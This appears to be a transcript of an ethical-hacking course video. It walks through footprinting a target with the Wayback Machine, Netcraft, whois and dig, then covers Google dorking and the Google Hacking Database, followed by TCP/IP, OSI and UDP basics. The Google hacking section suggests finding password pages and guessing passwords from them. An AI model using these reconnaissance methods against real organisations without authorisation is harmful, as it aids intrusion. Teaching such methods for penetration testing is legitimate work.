You don't want to miss anything out, because if you do that

you can continue and also provide some launching points for additional attacks or tests

that you may be able to do.

But this is definitely a starting point of the types of information that you need to have

as you go about footprinting your target.

Now next thing


that we are going to see
is very interesting.

This is one
of the many common tools

that are out there


on the internet and

that is the Wayback machine


or also known as archive.org.

Now, while it might not give you all the information that you need,

it certainly gives you a starting point,

and what we're talking about here is the Wayback Machine, or archive.org.

So let me just give you a quick look at what archive.org looks like.

Okay. I already have it open out here.

So what you can see is how a website looked around some time ago.

So for example,

if you want to look at


with Google look like

so you just have to search


for Google out here and wait

for results to come back.

Okay.

So we see that Google goes way back to 1998.

So that was the first capture by the Wayback Machine,

and we can see that it has a screenshot of November 11th and how Google looked.

So let's see what Google looked like on November 11th of 1998.

So this is what Google looked like; there was actually nothing to it.

It just said "Welcome to Google, Google search engine prototype" and it has a link.

So yeah, this is what the Google search engine looked like.

It had a Stanford search, it had a Linux search and you could do all sorts of stuff.

What I'm trying to tell you all is you can see the evolution of the website through time

with the Wayback Machine,

and this gives you a rather informative look into how a website has actually evolved.

Okay.

Now that we know what footprinting is and how it falls into the whole reconnaissance process,

So let's go over a couple


of websites to do a little bit

of historical thinking
about companies and the types

of infrastructure
that they may be using

and this information


of course is useful

so that we can narrow


down our Focus.

Us in terms of what we want


to Target against them

for attacks now over time


we've improved our awareness

about what sorts

of information we may want


to divulge so several years ago

you may have gone to a company's


website and discover

that you could get


email addresses and names

of people in positions

that you may find relevant

and there were all sorts


of bits of information

that could be used


against the company

and over time we have discovered

that those are pieces

of information probably
don't belong in a website

where they can be used


against the company

and so they've been pulled


off.

Now it used to be also that Google had the ability to pull up information that it had cached.

So for example, if a website was no longer available or if it was temporarily down and offline,

there was a little cache button that you could click when you did a Google search,

and you could pull up that cached information.

So even though the website wasn't available, you could still get information from Google's servers.

Now Google has removed that, so we don't have that ability any longer.

However, there is
an internet archive

that we can Use so this thing


is called the Wayback machine

and I have it open out here.

So it's archive.org / web.

So archive.org is a website

that gives us information


about other websites

and how they look


like in years ago

and by so I'm going to go


to the Wayback machine

which you can see is


at the archive.org

and I'm going to go and try and search for edureka.co.

So now we're going to take a historical look at edureka.co's website,

and you can see we've got some years and they've got information going back up to 2013,

so let's look at what this website looked like in 2013.

Okay, there doesn't seem to be any snapshots out here. I wonder what's going on.

Okay. So let's go to 2014, and the first snapshot seems to be on September 12th of 2014.

Actually, it's on May 17th, so let's see what that looks like.

Okay. So this is what edureka looked like back in 2014, September 12th 2014 to be exact.

Now you can see that we have some live classes and all these pictures there,

and they've got this weird picture of the sky, and I don't know why that was a thing back in 2014.

Now we can browse more


advanced screen shots

or rather the screen shots


that were taken later on and see

how this company has evolved


with this infrastructure

and the way it actually


lays out its content.

Okay, so it still hasn't evolved


but I can go a couple
of years ahead and see

what this has actually


evolved into so

if I would go to December 2016,

so this is what it looked


like in 2016 and we can see

that they've added


this weird box out here

about brides and courses


they have other search bar

that kind of looks weird,

but it's mostly


because my Internet is slow

and it's not loading


all the elements.

They've also changed

how they've actually laid


out the courses we can also.

also see a change in the prices, I guess.

So, yeah, this tells us about how it evolved as a complete website.

Now the other website I want to talk about is called Netcraft.

Now Netcraft does internet research, including the types of web servers that companies run,

and they have a web server survey.

You can see here, as we scroll, that the Apache server has 64.3 percent of the internet market, of course,

and that's followed by Microsoft with 13 percent.

Interesting information, maybe useful information,

but even more useful than that is looking at what different companies run for their websites,

and you can see here.

Okay.

So let's try and search for edureka.co here.

So let's just put in the website URL and let Netcraft generate the site report.

So as you can see, some stuff is not available.

You know that the netblock owner is Amazon Technologies,

the name server is this thing right here, the DNS admin is awsdns-hostmaster.

We also have the IP address; we can go for a whois lookup, look up the IP on VirusTotal, you can do that.

There is no IPv6 present.

So that's some information that we can see, so we can obviously opt to not target IPv6 ranges.

Then there's also reverse DNS

then we also have a bunch


of Hosting history.

So this is a history
of it and we know
that it's hosted on a Linux
system with an Apache web server

and it was last seen

and this was when it


was last updated.

So this is some very


useful information.

You can also get information on sites like Netflix, so if you just type... okay, I just spelled that wrong.

So let me just change the URL out here.

So if you go and type netflix.com you'll see that it will show you all sorts of information.

So as you see, it's on an AWS server, it's Amazon Data Services Ireland,

and this is all the hosting history that goes along with it.

It has Sender Policy Framework and Domain-based Message Authentication, Reporting and Conformance information,

and there's all sorts of information that you can get about websites and web servers from Netcraft.

So the Wayback Machine along with Netcraft make up some interesting tools that are available on the internet

from which you can do a little bit of your reconnaissance research.

Okay.

Now that we have gone


over net craft

and the Wayback machine now,

it's time to actually

get to know how to use


the little information that the site actually provides.

So the next topic that we are going to go over is using DNS to get more information.

Now we're going to be going over a tool. This is called whois,

and it's the utility that is used to query the various regional internet registries

that store information about domain names and IP addresses,

and let me just show you all the internet registries that are there.

So I have arin.net open out here, and these are the internet registries

that provide for the ISPs and look over the internet's address allocation as a whole.

So here we have AFRINIC, we have APNIC, we have ARIN, we have LACNIC and we have RIPE NCC.

So these are all the regions and all the different types of stuff that they support,

all the different countries.

You can look at the map that it is pulling up out here by just hovering over the providers.

So as you can see, all this brown region out here is Africa, AFRINIC;

then we have APNIC, which is the black or greyish thing, which is India and Australia and quite a lot of Asia;

then we have ARIN, which is a lot of North America and the United States;

then there's LACNIC, which is mostly the Latin side, which is the South American part;

then we have the rest of Europe, which is RIPE NCC, and this is the part that RIPE NCC is providing internet to.

Okay. So that was all about the internet registries.

Now, let's get back to the topic

and that is using DNS


to get more information.

Now for this we are going to be using a Linux based system.

So I have a Linux VM running out here and let me just log into it.

So firstly we are going to be using this query called whois

that looks up these internet registries that I just showed you.

Let me just quickly clear this. Okay.

So for acquiring information from the regional internet registries that I just talked about,

you can use whois to get information about who owns a particular IP address.

So for example, I could do whois, and let's see, I could do whois google, or rather netflix.com,

and we can get all sorts of information about Netflix.

So we can see that the registrar is MarkMonitor.

Then let's see, let's go up and look for all sorts of information that has been given to us by this whois query.

So as you guys can see, I just went a little bit too far.

Okay.

So registry domain ID: we have the domain ID where it is registered, and the registrar URL is MarkMonitor.

Okay. So this is MarkMonitor actually.

Now the creation date is 1997, so in case you hadn't realized, Netflix has been around for a long time,

and it's been updated in 2015.

And the registry expiry date, as we see, is 2019, so that's when it's going to actually expire.

Then this is all


useful information

so we can see all sorts


of domain status

the name server URL the DNS SEC


that it says unsigned.

This is very useful information

that is being provided


by very simple query.

Now, if you want to know who


owns a particular IP address,

so let's see if we get back


the IP address out there.

We should have got


back the IP address,

but it's kind of lost on me.

So to get back the IP address for a domain name, you could use this command called dig.

So you do dig netflix.com.

Now as you guys can see it has returned a bunch of multiple IP addresses,

and these are all the IP addresses that Netflix has.

So I could do something like, if I was trying to check out who owns a certain IP address,

for example I have got one of these IP addresses,

but let's just assume I don't know that it actually belongs to Netflix,

so I can go whois 54.77.108.2,

and it'll give


me some information

so As you guys can see


it is giving us a bunch

of information as to who this is


and how it is happening.

So we see that it is from arin.net, and so we can very smartly assume that it's from the North American part.

Now we can also see that it's in Seattle. So our guess was completely right.

So it also gives us a range. So this is something very useful.

So if you see, we now have the range of the IPs that might be being used by this guy.

So we indeed have 54 and it says it goes up to the end of that 54 range.

There's also 34 at last. Now let's check that out and see what information we get.

So whois, and let's check it out.

What was the IP that we were just seeing? It's 34.249.125.167.

So 34.249.1... I don't know. Let's see.

You can also put in a random IP address; it doesn't really matter and they'll give you the information.

So let's see, whois, and some IP address.

Even this seems to be an Amazon IP address, and it's also based in Seattle, and we got a bunch of information.

So that's how you can use the whois query and the dig query

to actually get all sorts of information about the domain name service

and get information from DNS, basically.

So now let's go over some theoretical part that is for DNS.

So, using DNS to get information: firstly, what is the domain name service and why do we need it?

So a domain name is a name given to an IP address so that it's easy to remember.

Of course, it's easy to remember names and mnemonics rather than a bunch of random weird numbers.

Now, this was mainly so that we can map names to IP addresses,

and we can get a bunch of information from the host name resolution.

So that's the purpose of DNS.

Now we will also be looking at how to find network ranges.

Okay.

Now before we get


onto actually moving on

to how to find out


the network ranges,

let me just show you how you can also use whois.

So with whois, suppose you want to know the domains with the word foo in them.

So you could go whois foo, and this will give you a whole bunch of things,

whether a foo exists and all the sorts of foos that there are on the internet.

So that was one interesting flag, and if you want to know more about how to use whois,

you could just go whois --help. Yes. Yeah.

So this is all the types of stuff that we can do with whois.

So you can set the host, we can set the port that we want to search on,

then we can set the -L flag and find all less specific matches,

and we can do an exact match, or an inverse lookup for specified attributes.

Then we can also set the source, we can request a verbose template for a type,

and we can choose a request template. So this is a bunch of stuff

So suppose you say `whois` with the verbose flag and, say, edureka.co, and it'll give you a verbose version. What we get back is "RIPE database query service; objects are in RPSL format". So, okay, let's try something else, like `whois netflix.com`. Okay, I'm sorry, I was supposed to be using the verbose flag and I kept doing -h, silly me. So you do -V and that will give you a much more detailed answer. Hmm, this is the RIPE database again, and I think I'm doing something wrong. Okay, just for that, let me just show you how to use the option where only primary keys are returned. Let's try that out. Okay, so it seems to be that this is a RIPE database query service and the objects are in RPSL format, so it won't really work for that. It also says that no entries were found, because of this error. So that is for some later lessons.

For now, I hope I gave you a good idea of how to use whois: you could just go `whois` followed by some IP address, 192.168.1.1 or something like that, or you could just go for a domain name like facebook and get all sorts of information about Facebook, when the query actually returns you something.

So let's move on to network ranges now. In this part of the video we are going to be going over the utility called whois, which is used for getting information from the DNS. Now, let me just show you a website. So these are the regional internet registries. The internet registries are used to store information about domain names and IP addresses, and there are five regional internet registries. First is ARIN, which is responsible for North America, so that would be the US and Canada. Then we have LACNIC, which is responsible for Latin America and portions of the Caribbean. Then there's RIPE, which is responsible for Europe, the Middle East and Central Asia. There's AFRINIC, which is responsible for Africa. And finally we have APNIC, which is responsible for the Asia-Pacific rim.

So those are the regional internet registries, and as I said, whois is responsible for acquiring information from the various regional internet registries, so you can use whois to get information about who owns a particular IP address. For example, let me just open up my Ubuntu system.
Let me clear this out first. So, as I was just saying, you could go `whois facebook.com`. Okay. So as you guys can see, we could find out pretty quickly who owns a particular IP address. So for example, I could do whois and just give it facebook.com, and it tells me who it belongs to. It also gives you who owns a particular IP address and who's responsible for it. From the information you can get email addresses that belong to a particular company; this one has an email address for the technical contact of the IP registration. So you can get all sorts of email addresses, technical contacts and all sorts of stuff out there. The notice says the registry database contains only .com and .net entries, along with all sorts of other information.

Now I want to query a different IP address, and of course different information belongs in the different regional internet registries. So if I want to go to a particular database, I will have to use the -h flag, so I could do `whois -h whois.arin.net` with the IP address, and I'm going to query that again. And of course I get the same information back, because that's where I went. So you could just go `whois -h` and then follow it with an IP address, something like 34.25.176.98; that's just some random IP address I just made up. And it says "whois: option..."? Okay, so it seems to want a capital H. Okay, so let's see that, and we get all sorts of information back from that: ARIN and all sorts of stuff. Now, I can get information about domains as well.

So if I query something like netflix.com, I can find out that this is actually Netflix, and there's an administrative contact and a technical contact. I also want to see the domain name servers, so the servers that have authority over the DNS entries for that particular domain. You can also see other information like when the record was created, and a whole bunch of different phone numbers that you can contact. In addition, the registries store information about IP addresses and domain names. Sometimes they will store information about particular host names, and there may be other reasons why you would store a host name, or particular information about a host, in the system of one of the RIRs. Now, if I wanted to look up something specifically, once I have found it I could do a lookup with whois; suppose, say, something like `whois foo`. So let's say `whois foo`.

Now, if you don't already have whois installed, you can easily install it by just going `apt install whois` on your Unix system, and that should do the trick, and then you can start using this really nifty tool.

Okay, so that was all about using whois. Now let's get on to actually finding the network ranges for a domain. Okay, so now let's talk about how we are going to go about finding network ranges. So suppose you've been brought in on an engagement and you only know the domain name, and you don't know much beyond that, and you're expected to figure out where everything is and what everything is. So how do you go about doing that?

Well, you use some of the tools that we either have been talking about or will soon be talking about in more detail. And the first thing I'm going to do is use a domain name, edureka.co, and I'm going to look it up and see if I get an IP address back. So let's just head over there and go `whois edureka.co`, or we could use the `host` command. So as you see, we get an IP address back, and that is 34.210.239.35; that is the IP address, and you see that I've got an IP address back.

So here's just an IP address, and I don't know who that IP address belongs to, and I also don't know how big the network range, or network block, is that it's associated with. So what I'm going to do is a whois, and I'm going to look up with ARIN who owns that IP address. So you can basically go `whois 34.210.239.35`. So as you guys can see, that gives us a bunch of information, and this one doesn't seem to have a very big network range, unlike something like Netflix.

So suppose we were to do something like `host netflix.com`, and see, now we have a bunch of IP addresses. So suppose we do `whois 52.99.40.147`; now I'm expecting Netflix to be a much larger company and have a bigger range. Yeah, now see, we get a NetRange. So this is the network range that we're talking about. So we had a random IP address, and now we have found the network range. So that's how you find network ranges, and this can be very useful. This gives me evidence that netflix.com has a presence on different addresses; the one I have also located by looking up that particular host name. So I've got one address here that I can look at. Let's take a look at the website, which may be at a different address.

Now, if I didn't have that, I could also go and do something like an MX lookup. So I could go `dig`, and this will give us all the mail servers, so `dig MX`. Let's see what MX does; actually, you go `dig -h` for a list of options. So these are all the options that we have, and the one that we're going to use is something like `dig MX netflix.com`. So these are all the mail exchangers, the MX records, that we have gotten back for Netflix, and this is information regarding it; it's still producing information, that's a lot of information to produce. Okay. So as I was just saying, using the MX type I could get back all the mail handlers; in this case their mail is being handled by Google, which is not particularly surprising.

Other things that you can do are check for different host names. Since I'm assuming the DNS probably doesn't allow zone transfers, since most DNS servers don't any more, although they used to, you may have to start guessing. So I could do something like `webmail` and see what we find out here. So it showed us a dump of all the information.
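The step just walked through, going from an address returned by `host` to the NetRange that whois prints, can be automated. The script below is an added example, not part of the course: it turns the NetRange line of a whois answer into CIDR blocks and sorts a domain's addresses into those inside and outside that range. The whois text is a constructed sample in the shape of an ARIN answer, with placeholder organization values.

```python
"""Turn the NetRange line of a whois answer into CIDR blocks and test
which of a domain's addresses fall inside them (added example)."""
import ipaddress
import re

# Constructed sample of what `whois <ip>` prints when the RIR is ARIN.
# The addresses are the ones from the walkthrough; the rest are placeholders.
SAMPLE_WHOIS = """\
NetRange:       52.99.0.0 - 52.99.255.255
CIDR:           52.99.0.0/16
NetName:        EXAMPLE-NET-PLACEHOLDER
Organization:   Example Org (placeholder)
OrgTechEmail:   tech@example.invalid
"""

NETRANGE_RE = re.compile(r"^NetRange:\s*(\S+)\s*-\s*(\S+)", re.MULTILINE)


def netrange_to_cidrs(whois_text):
    """Return the CIDR blocks covering the NetRange of a whois answer.

    Registries print the range as first and last address; most tooling
    wants CIDR notation, so summarize the range (a range that is not a
    single power-of-two block yields several CIDRs).
    """
    m = NETRANGE_RE.search(whois_text)
    if not m:
        return []
    first = ipaddress.ip_address(m.group(1))
    last = ipaddress.ip_address(m.group(2))
    return [str(n) for n in ipaddress.summarize_address_range(first, last)]


def addresses_in_range(addresses, cidrs):
    """Split addresses into those inside and those outside the CIDR blocks.

    An address outside every block is evidence of a presence somewhere
    else, which needs its own whois lookup to find its range.
    """
    nets = [ipaddress.ip_network(c) for c in cidrs]
    inside, outside = [], []
    for a in addresses:
        ip = ipaddress.ip_address(a)
        (inside if any(ip in n for n in nets) else outside).append(a)
    return inside, outside


if __name__ == "__main__":
    cidrs = netrange_to_cidrs(SAMPLE_WHOIS)
    # Constructed: addresses that `host` might return for a domain.
    hosts = ["52.99.40.147", "52.99.200.1", "34.210.239.35"]
    print("NetRange covers:", cidrs)
    print("inside / outside:", addresses_in_range(hosts, cidrs))
```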

Okay, so that was all about finding network ranges. Now, moving on to our next topic, which is using Google for reconnaissance. Some people also call this Google hacking. If you know how to use Google to exactly target and find what you are looking for, Google is an excellent tool for reconnaissance purposes, and today I'm going to show you how you could use Google precisely in your searches. So first of all, let's open a tab with Google; let's go to google.com. Okay.

So now we're going to be talking about how we can use Google to actually gain some information, or some targeted information. This is in general called Google hacking. Now, when I say Google hacking, I don't mean breaking into Google to steal information; I'm talking about making use of the specific keywords that Google understands, to get the most out of the queries that you submit.

So for example, a pretty basic one is the use of quotation marks: you quote things in order to search for specific phrases. Otherwise Google will find pages that have instances of all those words, rather than the words specifically together in a particular order. So I'm going to pull this query up, and this shows a list of... let me just show it to you. So you search for `index of`. Now this is showing us an index of all the films; this is basically all those "index of" sites. So as you guys can see, this shows an index of all sorts of films that are there. Now you can use "index of" and you see that we also have an index of downloads, or something like that: some .com/download, and it is an index of all sorts of stuff. Now you can go into some folder and check them out. I don't know what these are, but they're some sort of files. And this is how you can use Google.

Now let me just show you some more tricks. So suppose you're using Google to look for something like a presentation; you could use something like `filetype:pptx`, and it'll search for every file of that type. Okay, let's try some others: `filetype:pdf config`. Okay. So this brings up all the files of that type that have some configs in them; some gaming configuration, as we see, and this initial configuration of Liverpool. Now, you could also use something like `inurl:` followed by some other word, say "root", and this will give you all the pages that have "root" in their URL. So "King root", "Digital Trends" and "how to root Android"; that's the "root" part. And suppose you want to say something like all-in-filetype, or suppose you want some extension, so `.pptx`. Does that work? Let's search for JavaScript files. Okay, I think it's JS. Okay, that doesn't seem to work either; this shows us all the pages that mention it. No, it's just "external JS". I'm doing this wrong. So you could use filetype. So let's see, `filetype:doc`. So these are all the documents that you could find with the filetype operator. And you could also do `filetype:js`, I guess. Yeah, this gives you all the JavaScript files that are there.

So this is how you can use Google to actually narrow down your searches: suppose you want a particular set of keywords, and we want to make sure we get, say, the password file from Google.

Okay. So now let's go into more detail about the various things you can find using Google hacking. While Google hacking techniques are really useful for just general searching in Google, they're also useful for penetration testers or ethical hackers. You can narrow down the information that you get from Google to get a specific list of systems that may be vulnerable. So we can do things like look for pages that have "error" in the title. So I'm going to get a whole bunch of information: suppose we go `intitle:error`, and we get all sorts of stuff, and we can add the `-google` part; if you add `-google`, Google will not show you the results that are from Google itself. So we get various documentation pages from different vendors about the errors that they support. Here's one doc from Oracle about a Java error; with something more specific, we may be able to get errors about all sorts of other stuff. So this is how you could use the Google hacking technique to your own advantage as a penetration tester.

Now, let me also show you something called the Google Hacking Database. This is very useful for an ethical hacker. The Google Hacking Database was created several years ago by a guy called Johnny Long, who put this database together to begin to compile a list of searches that would bring up interesting information. Johnny has written a couple of books on Google hacking. So we're at the Google Hacking Database website here, and you can see them talk about Google dorks and all sorts of stuff. Now you can see that we can do all sorts of searches, like `inurl:` followed by something like `.asp`, and this brings up some portal pages. Out here you can also bring up some password pages, with "password" in the URL. This will give you all sorts of results on Google: suppose you go `inurl:` with something like "password", you can get all sorts of pages which have "password" in their URL. So maybe you can just guess a password from there too. So that was Google hacking, and the Google Hacking Database entries also have a number of categories that you can look through to find some specific things.

So you may be interested, of course, in searching for specific information that you may be looking for with regard to a specific product. For example, let me just show you the Exploit Database. These are all the certain types of entries you can go through out here, and as you see we have all sorts of things, like an SQL injection entry, and this one is something regarding archives. These let you get a foothold for some password cracking, and you can do some brute force checking; you can see here that it talks about the type of search and what it reveals. You can just click here on the Google search link, which will actually bring up the list of responses that Google generates. So let's look at this one here; this type is a log. This is something about cross-site scripting logs, and we can also see some other logs, if I'm not wrong, so some denial-of-service POC, and we can see a bunch of stuff. If you continue to scroll down there's other interesting information in here: somehow somebody's got a log that has a lot of information, and they've put it up on a website, so there's basically a bunch of information that you can see. You can also sometimes get some surveillance video and look into it. And this is basically how you could use Google.

So it's basically a list of queries that you can go through, and this is a very useful site if you are a penetration tester and looking for some help with your Google hacking terminology. So that's it for Google hacking. Now let's move on.

Okay. So now it's time for some networking fundamentals, and what better place to begin than with TCP/IP. We're going to be talking about the history of TCP/IP and the network that eventually morphed into the thing that we now call the internet. So this thing began in 1969, and it spun out of this government organization called ARPA, the Advanced Research Projects Agency. They had an idea to create a computer network that was resilient to a certain type of military attack, and the idea was to have a network that could survive certain types of war and warlike conditions. So ARPA sent out a request for proposals to BBN, which is Bolt Beranek and Newman, previously an acoustical consulting company, and they won the contract to build what was called the ARPANET. The first connection was in 1969. So that's where we get the idea that the internet began in 1969; the internet as we call it now began with ARPANET, but it has a long history that goes through NSFNET in the 1980s, after ARPANET was decommissioned and a lot of other networks were folded into this thing called NSFNET, which then turned into what we now call the internet, once a lot of other networks were connected into it.

The first protocol on the ARPANET was the 1822 protocol, the very first protocol defining communication on ARPANET; it was called the 1822 protocol because BBN Report 1822 describes how it works. Shortly after that came the NCP, the Network Control Program, and the Network Control Program consisted of the ARPANET host-to-host protocol and an initial connection protocol. Now, there's certainly not a direct correlation or analogy here, but if you want to think about it in a particular way, you can say that the ARPANET host-to-host protocol is kind of like UDP and the initial connection protocol, or ICP, is kind of like TCP. The host-to-host protocol provided a unidirectional, flow-controlled stream between hosts, which sounds a little bit like UDP, and ICP provided a bidirectional pair of streams between two hosts. And again, these aren't perfect analogies, but the host-to-host protocol is a little bit like UDP and ICP is a little bit like TCP.

Now, the first router was called an Interface Message Processor, and that was developed by BBN. It was actually a ruggedized Honeywell computer that had special interfaces and software. So the first router wasn't a ground-up built piece of hardware; it was actually an existing piece of hardware specially repurposed for this particular application. Honeywell had this computer that they made, and BBN took that and made some specific hardware interfaces and built some special software that allowed it to turn into this interface message processor, which passed messages over ARPANET from one location to another.

So where did IP come in? IP came in in 1973, as I just said, when a guy by the name of Vint Cerf and another guy by the name of Robert Kahn took the ideas of NCP and what the ARPANET was doing, and they tried to come up with some concepts that would work for the needs that the ARPANET had. By 1974 they had published a paper, published by the IEEE, in which they proposed some new protocols. They originally proposed a central protocol called TCP; later on TCP was broken into TCP and IP, to get away from the monolithic concept that TCP originally was. So they broke it into more modular protocols, and thus you get TCP and IP.

So how do we get to our version, which is IPv4, since that's the kind of internet that we're using right now? Version 6 is coming, and has been coming for many, many years now, but we're still mostly on version 4. So how did we get here? Between 1977 and 1979 we went through versions 0 to 3; by 1979 and 1980 we started using version 4, and that eventually became the de facto protocol on the internet in 1983, when NCP was finally shut down, because all the hosts on the ARPANET were using TCP/IP by that point. In 1992 work began on IP Next Generation, and for a long time the specifications in the RFCs talked about IPng; eventually IPng became known as IPv6. You may be wondering where IPv5 went. Well, it was a special-purpose protocol that had to do with streaming, and certainly not a widespread thing.

One of the differences between IPv4 and IPv6 is that IPv6 has a 128-bit address, which gives us the ability to have ridiculously large numbers of devices that have their own unique IP address; IPv4, by comparison, has only 32-bit addresses. And as you've probably heard, we're well on our way to exhausting the number of IP addresses that are available, and we've done a lot of things over the years to conserve address space and reuse address space, so we can continue extending to the point where we completely run out of IPv4 addresses. Another thing about IPv6 is that it attempts to fix some of the inherent issues in IP, and some of those have to do with security concerns; there are certainly a number of flaws in IPv4. When they started working on IP Next Generation, or IPv6, they tried to address some of those concerns and some of those issues. They may not have done it perfectly, but it was certainly an attempt; IPv6 attempts to fix some of the issues that were inherent in IP. And so that's the history of TCP/IP, which is still very relevant today.

Okay. So now that we've discussed a brief history of TCP/IP and how it came about up to TCP/IP version 4, let's discuss the model itself. We're going to be discussing two models, and those are the OSI model and the TCP/IP model. As I said, we'll be talking about the OSI and TCP/IP models for network protocols and network stacks. OSI, first of all, is the one that you see out here on the left-hand side of the screen, and OSI stands for Open Systems Interconnection. In the late 1970s, they started working on a model for how a network stack and network protocols would look. Originally the intent was to develop the model and then develop protocols that went with it. But what ended up happening was that after they developed the model, TCP/IP started really taking off, and the TCP/IP model was what went along with it and matched much better what was going on with TCP/IP, which became the predominant protocol; as a result, the OSI protocols never actually got developed. However, we still use the OSI model as a teaching tool, as well as a way of describing what's going on with the network stack and the applications; you'll often hear people talking about different layers, like "that's a layer 2 problem" or "a layer 3 thing". Now, continuing through these lessons, I'll refer occasionally to the different layers, and when I do that, I'm referring to the OSI model.

So let's take a look at the OSI model, starting from the bottom. We have the physical layer, which is where all the physical stuff lives: the wires and cables, the network interfaces, and the hubs, repeaters, switches and all that sort of stuff. So all that physical stuff is sitting in the physical layer. Now, sitting above this is the data link layer, and that's where the Ethernet protocol, the ATM protocol and frame relay live. I mentioned the switch below, in the physical layer: the switch lives at layer 1, but it operates at layer 2. And the reason it operates at layer 2 is because it looks at the data link address, the layer 2 or "physical" address, and that's not to be confused with the physical layer. It does get a little mixed up sometimes when we refer to the MAC address. The MAC address is not the physical address in the sense of the physical layer; it is the Media Access Control address of the system. The MAC address is referred to as a physical address because it lives on the physical interface and is bound to it physically. However, that MAC address, or Media Access Control address, lives at layer 2, the data link layer.

The network layer, which is right above, is layer 3. That's where IP lives, as well as ICMP and IPX, from the IPX/SPX suite of protocols from Novell. Routers operate at layer 3. At layer 4, above that, is the transport layer: that's TCP, UDP and SPX, again from the IPX/SPX suite of protocols. Above that is the session layer, which is layer 5; that's the home of SSH as well as several other protocols. Then there's the presentation layer, which is layer 6, and you'll often see people refer to something like JPEG or MPEG as examples of protocols that live at that layer. Finally, we have layer 7, which is the application layer, and that's HTTP, FTP, SMTP and similar application protocols, whose responsibility is to deliver and use the functionality. So that's basically the OSI model, and those are the seven layers of the OSI model, and there's an important thing to note here.

That is, when we are putting packets onto the wire, the packets get built from the top of the stack down to the bottom of the stack, which is why it's called a stack: each layer sits on top of the other. The application layer is responsible for beginning the process, and then that follows through the presentation, session and transport layers, and down through the network and data link layers, until we finally drop it on the wire at the physical layer. When it's received from the network, it goes from the bottom up: we receive it on the physical layer, and it gets handled by the data link layer, then the network layer, and so on up to the application layer. So basically, when a packet is going out, it starts at the application layer and leaves from the physical layer, and when a packet is coming in, it goes from the physical layer through the data link, network, transport, session and presentation layers to the application layer, and finally to the target application.

Now, what we're dealing with is an encapsulation process. At every layer on the way down, the different layers add bits of information to the datagram, or the packet, so that when it gets to the other side each layer knows where its demarcation point is. While it may seem obvious, each layer talks to the same layer on the other side. So when we drop a packet onto the wire, the physical layer talks to the physical layer; in other words, the electrical bits that get transmitted by the network interface on the first system are received on the second system. On the second system, the layer 2 headers that were put on by the first system get removed and handled as necessary. Same thing at the network layer: it's the network layer that puts on the IP header, and it's the network layer that removes the IP header and determines what to do from there, and so on and so on. Again, while it may seem obvious, it's an important distinction to recognize that each layer talks to its peer layer. And when you're building a packet you go down through the stack, and when you're receiving you come up the stack. And again, it's called a stack because you keep pushing things on top of the packet, and they get popped off on the other side.

So that was a detailed but brief explanation of how the OSI model is set up and how the OSI model works. Now, let's move on to the TCP/IP model, which is on the right-hand side, and you'll notice that there's a really big difference here, that being that there are only four layers in the TCP/IP model, as compared to the seven layers of the OSI model. We have the network access layer, the internet layer, the transport layer and the application layer. The functionality that the stack provides is the same; in other words, you're not going to get less functionality out of the TCP/IP model. It's just that they've changed where the functionality resides and where the demarcation points between the different layers are. So there are only four layers in the TCP/IP model, which means that a couple of layers have taken in functions from some of the OSI model's layers, and we can get into that right here.

The difference between the models: the network access layer in the TCP/IP model consists of the physical and the data link layers from the OSI model. So on the right here, you see the network access layer, which takes in the physical and data link layers from the OSI model on the left-hand side. Similarly, the application layer of the TCP/IP model compresses the session, presentation and application layers of the OSI model: on the right, the very top box, the application layer, encompasses the session, presentation and application layers on the left-hand side. That of course leaves the transport layer to be the same. And what the OSI model calls the network layer, the TCP/IP model calls the internet layer; same sort of thing, that's where IP lives, and even though it's called the internet layer as compared to the network layer, it's the same sort of functionality. So those are the really big differences between the OSI and TCP/IP models.

Any time I refer to layers through the course of this video, I'm going to be referring to the OSI model, in part because it makes it easier to differentiate the different functionality. If I were to say that something lives at a particular layer in the TCP/IP model, you wouldn't necessarily know if I was talking about a physical thing or a data link thing; since there's more granularity in the OSI model, it's better to talk about the functionality in terms of the layers in the OSI model. And those are the predominant models, the OSI model and the TCP/IP model, for network stacks, network protocols and applications.

Okay.

So now that we've discussed the TCP/IP model, let's go over another important protocol, and that is UDP. What you see on your screen right now is Wireshark; we'll be going over the uses of Wireshark and what it's useful for in the upcoming lessons, but for now let me just show you a UDP packet.

Okay. So before we get into the analysis of the packet, while it's still filtering, let me tell you a little bit about UDP. UDP is a protocol in the TCP/IP suite of protocols, and it sits in the transport layer, which is also the transport layer in the OSI reference model. The IP network layer underneath it carries the IP address, and that has the information about how to get a packet to its destination. The transport layer sits on top of the network layer and carries the information needed to differentiate the applications on a host, and that information is in the form of ports. So the transport layer has ports and the network layer has, in this case, an IP address.

UDP is a transport layer protocol, and UDP stands for User Datagram Protocol. It is often called connectionless, or sometimes unreliable. Now unreliable doesn't mean that you can't rely on it; unreliable means that you can't be sure that what you sent is reaching the other side. It means there's nothing in the protocol that guarantees the datagram you send is going to get where you wanted to send it. So the protocol has no safety feature like that, and you shouldn't use UDP if you want that sort of safety net. If you need it, you have to write it into your own application.

So basically UDP is a fast protocol, and that's one of the reasons why it's good. It's also one of the reasons why it's unreliable, because in order to get that speed you don't have all of the error checking, retransmission and validation that messages are actually getting there. Because it's fast, it's good for things like games and for real-time voice and video, anything where speed is more important than delivery of every single packet. That's where you would use UDP.

So right here I have a packet capture. I'm using Wireshark to capture some packets, and let's check out a UDP packet. Out here you see that there is a frame line that says 167 bytes on wire, 167 bytes captured, but we're not really interested in the frame part; we're interested in the User Datagram Protocol. Here you can see that the source port is 1853 and the destination port is 52081, and then it has a length and a checksum, and that's it.

So as you can see, we don't see a lot of information. All you see is a source port, a destination port, a length and a checksum. UDP doesn't come with an awful lot of headers because it doesn't need any of the things you see in the other packet headers. The only thing it needs is to tell you how to reach the application on the receiving host, and that's where the destination port comes in. Once the message gets to the destination, the destination needs to know how to communicate back to the originator, and that's through the source port: a return message would use the source port as its destination port and send back to that port in order to communicate with the originator.

So we have a source port and a destination port, and the length is a minimal amount of checking: if the packet you received is a different size from the length specified in the UDP header, then something may have gone wrong, so you may want to discard the message and move on to the next one. The checksum also makes sure that nothing in the middle was corrupted, although if there's some sort of man-in-the-middle attack or something like that, a checksum is pretty easy to recompute after you've altered the packet. It protects against accidental corruption, not against a deliberate attacker; integrity against an attacker has to come from a higher layer, such as TLS or DTLS.

So you can see here that there are a number of UDP packets. Some of them are just UDP; the one I'm looking at happens to be from some Skype application, I guess, talking to Skype servers, and we've already got DNS. Now DNS also needs fast response times, because you don't want to spend a lot of time looking up information about the servers you're going to before you can actually go to them. So DNS resolvers send their queries out over UDP hoping to get fast responses; they don't want to spend a lot of time setting up connections and doing all the negotiating that comes with a protocol like TCP, for example.

